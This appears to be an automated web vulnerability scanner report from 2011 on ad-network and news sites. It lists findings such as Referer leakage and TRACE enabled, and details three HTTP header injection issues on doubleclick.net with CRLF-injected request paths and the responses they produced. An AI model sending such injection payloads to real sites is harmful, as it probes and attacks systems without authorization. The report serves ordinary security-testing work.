11.14. http://www.facebook.com/plugins/likebox.php

11.15. http://www.facebook.com/widgets/like.php

11.16. http://www.youtube.com/embed/TVqe8ieqz10

12. Cross-domain POST

13. Cross-domain Referer leakage

13.1. http://0.tqn.com/0g/js/cj017x14t421p9.js

13.2. http://9.mshcdn.com/wp-content/themes/v7/js/core.js

13.3. http://a.tribalfusion.com/j.ad

13.4. http://a.tribalfusion.com/j.ad

13.5. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5

13.6. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5362797.34

13.7. http://ad.doubleclick.net/adi/abt.newsissues/newsissues_urbanlegends

13.8. http://ad.doubleclick.net/adi/abt.newsissues/newsissues_urbanlegends

13.9. http://ad.doubleclick.net/adi/pcw.main.blogs/bizfeed/index

13.10. http://ad.doubleclick.net/adi/pcw.main.blogs/bizfeed/index

13.11. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article

13.12. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article

13.13. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.13

13.14. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.14

13.15. http://ad.doubleclick.net/adj/cdg.examiner2.national/

13.16. http://ad.doubleclick.net/adj/idgt.data.advertisers/laptops

13.17. http://ad.doubleclick.net/adj/imdb2.consumer.title/maindetails

13.18. http://ad.doubleclick.net/adj/mash.to/atf_j_s/tech

13.19. http://ad.doubleclick.net/adj/mash.to/btf_j_s/tech

13.20. http://admeld-match.dotomi.com/admeld/match

13.21. http://ads.pointroll.com/PortalServe/

13.22. http://ads.pointroll.com/PortalServe/

13.23. http://adserving2.cpxinteractive.com/st

13.24. http://arstechnica.com/public/shared/scripts/ad-loader-frame.html

13.25. http://as.casalemedia.com/j

13.26. http://as.casalemedia.com/j

13.27. http://badges.del.icio.us/feeds/json/url/data

13.28. http://bcp.crwdcntrl.net/px

13.29. http://bcp.crwdcntrl.net/px

13.30. http://bidder.mathtag.com/iframe/notify

13.31. http://bidder.mathtag.com/iframe/notify

13.32. http://bidder.mathtag.com/iframe/notify

13.33. http://bidder.mathtag.com/iframe/notify

13.34. http://bwp.zdnet.com/search

13.35. http://choices.truste.com/ca

13.36. http://cm.g.doubleclick.net/pixel

13.37. http://cm.g.doubleclick.net/pixel

13.38. http://cm.g.doubleclick.net/pixel

13.39. http://cm.npc-gatehouse.overture.com/js_1_0/

13.40. http://cm.npc-scripps.overture.com/js_1_0/

13.41. http://googleads.g.doubleclick.net/pagead/ads

13.42. http://googleads.g.doubleclick.net/pagead/ads

13.43. http://googleads.g.doubleclick.net/pagead/ads

13.44. http://googleads.g.doubleclick.net/pagead/ads

13.45. http://googleads.g.doubleclick.net/pagead/ads

13.46. http://googleads.g.doubleclick.net/pagead/ads

13.47. http://googleads.g.doubleclick.net/pagead/ads

13.48. http://googleads.g.doubleclick.net/pagead/ads

13.49. http://ib.adnxs.com/ptj

13.50. http://ib.adnxs.com/seg

13.51. http://loadus.exelator.com/load/

13.52. http://loadus.exelator.com/load/net.php

13.53. http://mads.com.com/mac-ad

13.54. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr

13.55. http://p.brilig.com/contact/bct

13.56. http://p.brilig.com/contact/bct

13.57. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr

13.58. http://rcm.amazon.com/e/cm

13.59. http://shop.mysuburbanlife.com/ROP/portablerop.aspx

13.60. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.61. http://static.arstechnica.net//public/v6/footer.html

13.62. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf

13.63. http://tags.bluekai.com/site/3307

13.64. http://www.chromium.org/chromium-os/comp2jpg

13.65. http://www.dailyfeatures.com/corridor/fodjava.cfm

13.66. http://www.facebook.com/connect/connect.php

13.67. http://www.facebook.com/plugins/activity.php

13.68. http://www.facebook.com/plugins/activity.php

13.69. http://www.facebook.com/plugins/comments.php

13.70. http://www.facebook.com/plugins/like.php

13.71. http://www.facebook.com/plugins/likebox.php

13.72. http://www.facebook.com/widgets/like.php

13.73. http://www.google.com/trends/hottrends

13.74. http://www.google.com/trends/hottrends

13.75. http://www.google.com/trends/hottrends

13.76. http://www.stumbleupon.com/badge/embed/1/

13.77. http://www.stumbleupon.com/badge/embed/5/

13.78. http://www.youtube.com/embed/TVqe8ieqz10

14. Cross-domain script include

14.1. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5

14.2. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5362797.34

14.3. http://ad.doubleclick.net/adi/abt.newsissues/newsissues_urbanlegends

14.4. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article

14.5. http://arstechnica.com/public/shared/scripts/ad-loader-frame.html

14.6. http://bcp.crwdcntrl.net/px

14.7. http://bcp.crwdcntrl.net/px

14.8. http://bidder.mathtag.com/iframe/notify

14.9. http://bidder.mathtag.com/iframe/notify

14.10. http://cdn.optmd.com/V2/80181/197813/index.html

14.11. http://crenk.com/buy-chromebook/

14.12. http://fridaythe13thfilms.com/

14.13. http://g-ecx.images-amazon.com/images/G/01/pda/pda.js

14.14. http://googleads.g.doubleclick.net/pagead/ads

14.15. http://googleads.g.doubleclick.net/pagead/ads

14.16. http://mashable.com/2011/05/11/google-chrome-notebooks/

14.17. http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html

14.18. http://r1-ads.ace.advertising.com/site=755601/size=728090/u=2/bnum=1468728/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fad.yieldmanager.com%252Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D621649

14.19. http://routenote.com/blog/TFadvertising/300.htm

14.20. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf

14.21. http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm

14.22. http://www.chromium.org/chromium-os

14.23. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/

14.24. http://www.dailyfeatures.com/corridor/fodjava.cfm

14.25. http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds

14.26. http://www.facebook.com/connect/connect.php

14.27. http://www.facebook.com/plugins/activity.php

14.28. http://www.facebook.com/plugins/comments.php

14.29. http://www.facebook.com/plugins/like.php

14.30. http://www.facebook.com/plugins/likebox.php

14.31. http://www.facebook.com/widgets/like.php

14.32. http://www.fridaythe13thmovie.com/

14.33. http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/

14.34. http://www.greenfieldreporter.com/view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/

14.35. http://www.imdb.com/images/a/ifb/google_afc_labs.html

14.36. http://www.imdb.com/images/a/ifb/pda_comm2.html

14.37. http://www.imdb.com/title/tt0758746/

14.38. http://www.imdb.com/title/tt0758746/_ajax/footer

14.39. http://www.milehighonthecheap.com/2011/05/no-foolin-free-cat-friday-adoption-special-in-boulder/

14.40. http://www.milehighonthecheap.com/wp-content/themes/atahualpa353/images/favicon/cities.ico

14.41. http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th

14.42. http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html

14.43. http://www.pcworld.com/blogs/id,61/bizfeed.html

14.44. http://www.stumbleupon.com/badge/embed/1/

14.45. http://www.stumbleupon.com/badge/embed/5/

14.46. http://www.youtube.com/embed/TVqe8ieqz10

14.47. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

14.48. http://z-ecx.images-amazon.com/images/G/01/pda/ifc._V195103274_.js

15. TRACE method is enabled

15.1. http://admeld-match.dotomi.com/

15.2. http://cache.alluremedia.com.au/

15.3. http://dw.com.com/

15.4. http://dw.zdnet.com/

15.5. http://ping.crowdscience.com/

15.6. http://routenote.com/

15.7. http://tags.bluekai.com/

15.8. http://tenzing.fmpub.net/

15.9. http://www.gizmodo.com.au/

15.10. http://www.pcworld.com/

15.11. http://www.stumbleupon.com/

16. Email addresses disclosed

16.1. http://ads.adbrite.com/adserver/behavioral-data/8201

16.2. http://ads.adbrite.com/adserver/behavioral-data/8203

16.3. http://ads.adbrite.com/adserver/behavioral-data/8203

16.4. http://arstechnica.com/public/shared/scripts/da-1.5.js

16.5. http://bstats.adbrite.com/click/bstats.gif

16.6. http://bstats.adbrite.com/click/bstats.gif

16.7. http://cdn2-b.examiner.com/sites/default/files/js/js_LqkV37b8-egkARv7p97FuP3iNsJGDYwioPZ9WfY1sD0_72.js

16.8. http://fridaythe13thfilms.com/

16.9. http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html

16.10. http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html

16.11. http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/

16.12. http://www.greenfieldreporter.com/assets/scripts/menu/menu.js

16.13. http://www.h-online.com/open/news/item/Google-s-Chrome-OS-machines-arrive-1242072.html

16.14. http://www.milehighonthecheap.com/2011/05/no-foolin-free-cat-friday-adoption-special-in-boulder/

16.15. http://www.milehighonthecheap.com/wp-content/themes/atahualpa353/images/favicon/cities.ico

16.16. http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th

16.17. http://www.pcworld.com/pcworldconnect/a

16.18. http://www.pubmatic.com/category/blog

16.19. http://www2.warnerbros.com/all/us/omniture/s_code_wbrostheatricaldomesticdvd.js

17. Private IP addresses disclosed

17.1. http://badge.facebook.com/badge/10042561111.528147018.1934312001.png

17.2. http://badge.facebook.com/badge/111279988891248.528147018.678371001.png

17.3. http://crenk.com/favicon.ico

17.4. http://crenk.com/wp-content/plugins/buddypress-share-it/img/buzz.png

17.5. http://crenk.com/wp-content/plugins/buddypress-share-it/img/digg.png

17.6. http://crenk.com/wp-content/plugins/buddypress-share-it/img/email.png

17.7. http://crenk.com/wp-content/plugins/buddypress-share-it/img/share.png

17.8. http://crenk.com/wp-content/plugins/buddypress-share-it/img/tweet.png

17.9. http://crenk.com/wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/60pc_black.png

17.10. http://crenk.com/wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/admin-menu-arrow.gif

17.11. http://crenk.com/wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/sidebar_back.gif

17.12. http://crenk.com/wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/white-grad.png

17.13. http://crenk.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/images/audio_icon.png

17.14. http://crenk.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/images/refresh.png

17.15. http://crenk.com/wp-content/plugins/socialize/images/delicous.png

17.16. http://crenk.com/wp-content/uploads/2010/08/rss.png

17.17. http://crenk.com/wp-content/uploads/2010/08/twitter.png

17.18. http://crenk.com/wp-content/uploads/2010/08/youtube.png

17.19. http://crenk.com/wp-content/uploads/2011/03/android.jpg

17.20. http://crenk.com/wp-content/uploads/2011/03/apple-ipad-2.jpg

17.21. http://crenk.com/wp-content/uploads/2011/03/apple-news.jpg

17.22. http://crenk.com/wp-content/uploads/2011/04/bjkgdru.png

17.23. http://crenk.com/wp-content/uploads/2011/04/crenkwriting1.png

17.24. http://crenk.com/wp-content/uploads/2011/04/header1.png

17.25. http://crenk.com/wp-includes/images/blank.gif

17.26. http://platform.ak.fbcdn.net/www/app_full_proxy.php

17.27. http://platform.ak.fbcdn.net/www/app_full_proxy.php

17.28. http://platform.ak.fbcdn.net/www/app_full_proxy.php

17.29. http://static.ak.fbcdn.net/connect/xd_proxy.php

17.30. http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/ZAHAqkTqkUj.css

17.31. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/8jsqXuInNCS.js

17.32. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/irfZ-ZFdjLY.js

17.33. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/yhiZPPsJHzF.css

17.34. http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/-bv7QJTbOXU.css

17.35. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/EEmuV3MlHAh.css

17.36. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/uxGNY7N_95r.js

17.37. http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/8OjmYm2TiWI.js

17.38. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/L-db0ALpEr8.js

17.39. http://stats.examiner.com/b/ss/examinercom/1/H.21/s24557034953031

17.40. http://vimeo.com/moogaloop.swf

17.41. http://vimeo.com/moogaloop.swf

17.42. http://vimeo.com/moogaloop.swf

17.43. http://vimeo.com/moogaloop.swf

17.44. http://vimeo.com/moogaloop.swf

17.45. http://vimeo.com/moogaloop.swf

17.46. http://vimeo.com/moogaloop.swf

17.47. http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds

17.48. http://www.facebook.com/ajax/connect/connect_widget.php

17.49. http://www.facebook.com/connect/connect.php

17.50. http://www.facebook.com/extern/login_status.php

17.51. http://www.facebook.com/extern/login_status.php

17.52. http://www.facebook.com/extern/login_status.php

17.53. http://www.facebook.com/extern/login_status.php

17.54. http://www.facebook.com/extern/login_status.php

17.55. http://www.facebook.com/images/fb_logo_small.png

17.56. http://www.facebook.com/images/icons/fbpage.gif

17.57. http://www.facebook.com/plugins/activity.php

17.58. http://www.facebook.com/plugins/activity.php

17.59. http://www.facebook.com/plugins/comments.php

17.60. http://www.facebook.com/plugins/like.php

17.61. http://www.facebook.com/plugins/like.php

17.62. http://www.facebook.com/plugins/like.php

17.63. http://www.facebook.com/plugins/like.php

17.64. http://www.facebook.com/plugins/like.php

17.65. http://www.facebook.com/plugins/like.php

17.66. http://www.facebook.com/plugins/like.php

17.67. http://www.facebook.com/plugins/like.php

17.68. http://www.facebook.com/plugins/like.php

17.69. http://www.facebook.com/plugins/like.php

17.70. http://www.facebook.com/plugins/like.php

17.71. http://www.facebook.com/plugins/like.php

17.72. http://www.facebook.com/plugins/like.php

17.73. http://www.facebook.com/plugins/likebox.php

17.74. http://www.facebook.com/profile/pic.php

17.75. http://www.facebook.com/profile/pic.php

17.76. http://www.facebook.com/widgets/like.php

17.77. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

18. Credit card numbers disclosed

19. Robots.txt file

19.1. http://a.tribalfusion.com/displayAd.js

19.2. http://ad-emea.doubleclick.net/N6514/adj/uk/uk-open

19.3. http://ad.doubleclick.net/adj/ars.dart/ce_gear

19.4. http://admeld-match.dotomi.com/admeld/match

19.5. http://adx.g.doubleclick.net/pagead/adview

19.6. http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

19.7. http://altfarm.mediaplex.com/ad/tr/10759-119438-1104-0

19.8. http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars

19.9. http://b.scorecardresearch.com/beacon.js

19.10. http://b.voicefive.com/b

19.11. http://badges.del.icio.us/feeds/json/url/data

19.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs

19.13. http://bwp.zdnet.com/search

19.14. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_0/StdBanner.js

19.15. http://dw.com.com/rubicsimp/c.gif

19.16. http://dw.zdnet.com/clear/c.gif

19.17. http://feeds.delicious.com/v2/json/urlinfo/data

19.18. http://googleads.g.doubleclick.net/pagead/ads

19.19. http://mads.com.com/mac-ad

19.20. http://mads.zdnet.com/mac-ad

19.21. http://mashable.com/2011/05/11/google-chrome-notebooks/

19.22. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

19.23. http://pubads.g.doubleclick.net/gampad/ads

19.24. http://routenote.com/blog/TFadvertising/300.htm

19.25. http://s.gravatar.com/js/gprofiles.js

19.26. http://service.zdnet.com/wi

19.27. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.28. http://static.crowdscience.com/start-c2e7cdddce.js

19.29. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf

19.30. http://tags.crwdcntrl.net/c/313/cc_af.js

19.31. http://tags.gawker.com/assets/minify.php

19.32. http://www.chromium.org/chromium-os

19.33. http://www.facebook.com/plugins/like.php

19.34. http://www.google-analytics.com/__utm.gif

19.35. http://www.h-online.com/open/news/item/Google-s-Chrome-OS-machines-arrive-1242072.html

19.36. http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html

19.37. http://www.reddit.com/button.js

19.38. http://www.stumbleupon.com/hostedbadge.php

19.39. http://www.youtube.com/embed/TVqe8ieqz10

19.40. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

20. HTML does not specify charset

20.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

20.2. http://480-adver-view.c3metrics.com/v.js

20.3. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5

20.4. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5362797.34

20.5. http://ad.doubleclick.net/adi/abt.newsissues/newsissues_urbanlegends

20.6. http://ad.doubleclick.net/adi/pcw.main.blogs/bizfeed/index

20.7. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article

20.8. http://ad.yieldmanager.com/iframe3

20.9. http://ads.pointroll.com/PortalServe/

20.10. http://arstechnica.com/public/shared/scripts/empty.html

20.11. http://aud.pubmatic.com/AdServer/Artemis

20.12. http://bidder.mathtag.com/iframe/notify

20.13. http://bpx.a9.com/amzn/iframe.html

20.14. http://bs.serving-sys.com/BurstingPipe/adServer.bs

20.15. http://cdn-bpx.a9.com/amzn/defaultad.html

20.16. http://cdn-bpx.a9.com/amzn/iframe.html

20.17. http://image3.pubmatic.com/AdServer/UPug

20.18. http://load.exelator.com/load/

20.19. http://loadus.exelator.com/load/net.php

20.20. http://mads.com.com/mac-ad

20.21. http://odb.outbrain.com/utils/ping.html

20.22. http://p.brilig.com/contact/bct

20.23. http://pixel.invitemedia.com/data_sync

20.24. http://showadsak.pubmatic.com/AdServer/AdServerServlet

20.25. http://static.arstechnica.net//public/v6/footer.html

20.26. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf

20.27. http://tags.bluekai.com/site/3307

20.28. http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm

20.29. http://w55c.net/ct/cms-2-frame.html

20.30. http://www.greenfieldreporter.com/favicon.ico

20.31. http://www.imdb.com/images/SF8dcd77f70a5de2a050e47b985a4dfa00/a/js/scriptloader.html

20.32. http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html

20.33. http://www.imdb.com/images/a/ifb/google_afc_labs.html

20.34. http://www.imdb.com/images/a/ifb/pda_comm2.html

20.35. http://www.imdb.com/title/tt0758746/_ajax/footer

20.36. http://z.about.com/6g/ip/284/27.htm

21. HTML uses unrecognised charset

22. Content type incorrectly stated

22.1. http://0.tqn.com/0g/js/cj017x14t421p9.js

22.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

22.3. http://480-adver-view.c3metrics.com/v.js

22.4. http://a1.interclick.com/getInPageJS.aspx

22.5. http://a1.interclick.com/getInPageJSProcess.aspx

22.6. http://ads.pointroll.com/PortalServe/

22.7. http://apptap.scripps.com/apptap3

22.8. http://ar.voicefive.com/b/rc.pli

22.9. http://aud.pubmatic.com/AdServer/Artemis

22.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs

22.11. http://cdn.gigya.com/js/gigya.services.socialize.plugins.login.min.js

22.12. http://cdn2-b.examiner.com/sites/all/themes/mvt/favicon.ico

22.13. http://cdn2-b.examiner.com/sites/all/themes/x2/fonts/Museo500-Regular-webfont.woff

22.14. http://cm.npc-gatehouse.overture.com/partner/css/ads.css

22.15. http://crenk.com/favicon.ico

22.16. http://crenk.com/wp-admin/admin-ajax.php

22.17. http://feeds.delicious.com/v2/json/urlinfo/data

22.18. http://hits.nextstat.com/cgi-bin/wsv2.cgi

22.19. http://image3.pubmatic.com/AdServer/UPug

22.20. http://media.courierpress.com/corp_assets/asphalt/_sites/ecp/img/favicon.ico

22.21. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/makeRequest

22.22. http://ping.crowdscience.com/ping.js

22.23. http://rtb50.doubleverify.com/rtb.ashx/verifyc

22.24. http://service.zdnet.com/wi

22.25. http://shop.mysuburbanlife.com/ROP/portablerop.aspx

22.26. http://showadsak.pubmatic.com/AdServer/AdServerServlet

22.27. http://static.fmpub.net/site/mashable

22.28. http://www.facebook.com/extern/login_status.php

22.29. http://www.facebook.com/profile/pic.php

22.30. http://www.milehighonthecheap.com/wp-content/plugins/anti-captcha/anti-captcha-0.2.js.php

22.31. http://www.mysuburbanlife.com/!/commenting/users/check_status

22.32. http://www.stumbleupon.com/hostedbadge.php

22.33. http://www.zdnet.com/toolbar-service

22.34. http://zapp0.staticworld.net/news/graphics/221051-cr-48_180.png

22.35. http://zapp5.staticworld.net/ad/preview/intel_blog_042011/module/blog_module_top_a_336x560_t.jpg

22.36. http://zapp5.staticworld.net/howto/graphics/162760-drm-free._originaljpeg

23. Content type is not specified

23.1. http://ad.yieldmanager.com/st

23.2. http://www.assoc-amazon.com/s/ads-common.js



1. HTTP header injection  next
There are 3 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://ad.doubleclick.net/ad/pcw.main.trackingpixel/WileyShoppingAisleModuleTrackingPixel [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/pcw.main.trackingpixel/WileyShoppingAisleModuleTrackingPixel

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6b223%0d%0a58ef8e18c3b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6b223%0d%0a58ef8e18c3b/pcw.main.trackingpixel/WileyShoppingAisleModuleTrackingPixel;sz=1x1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6b223
58ef8e18c3b
/pcw.main.trackingpixel/WileyShoppingAisleModuleTrackingPixel;sz=1x1:
Date: Thu, 12 May 2011 13:29:46 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.2. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/pcw.main.news/products/computers/laptops/article

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1ca5f%0d%0a5ace8b09f35 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1ca5f%0d%0a5ace8b09f35/pcw.main.news/products/computers/laptops/article;blg=bizfeed;pg=article;aid=227430;c=2103;c=2101;c=1732;c=1756;pos=728leader;tile=1;sz=728x90;ord=77720659?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1ca5f
5ace8b09f35
/pcw.main.news/products/computers/laptops/article;blg=bizfeed;pg=article;aid=227430;c=2103;c=2101;c=1732;c=1756;pos=728leader;tile=1;sz=728x90;ord=77720659:
Date: Thu, 12 May 2011 13:29:15 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.3. http://ad.doubleclick.net/adj/ars.dart/ce_gear [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ars.dart/ce_gear

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 777ac%0d%0afed51a7b09 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /777ac%0d%0afed51a7b09/ars.dart/ce_gear;abr=!webtv;mtfIFPath=/mt-static/plugins/ArsTheme/ad-campaigns/doubleclick/;tile=2;sz=300x250;kw=top;kw=more-chromebooks-from-google-chrome-os-web-store-updates-too;kw=05;kw=2011;kw=news;kw=gadgets;ord=46317853808868680;kw=all;kw=cndeage1824;kw=ltmppmg HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/public/shared/scripts/ad-loader-frame.html?req=http://ad.doubleclick.net/adj/ars.dart/ce_gear;abr=!webtv;mtfIFPath=/mt-static/plugins/ArsTheme/ad-campaigns/doubleclick/;tile=2;sz=300x250;kw=top;kw=more-chromebooks-from-google-chrome-os-web-store-updates-too;kw=05;kw=2011;kw=news;kw=gadgets;ord=46317853808868680
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/777ac
fed51a7b09
/ars.dart/ce_gear;abr=!webtv;mtfIFPath=/mt-static/plugins/ArsTheme/ad-campaigns/doubleclick/;tile=2;sz=300x250;kw=top;kw=more-chromebooks-from-google-chrome-os-web-store-updates-too;kw=05;kw=2011;kw=news;kw=gadgets;ord=46317853808868680;kw=all;kw=cndeage1824;kw=ltmppmg:
Date: Thu, 12 May 2011 13:28:43 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2. Cross-site scripting (reflected)  previous  next
There are 156 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

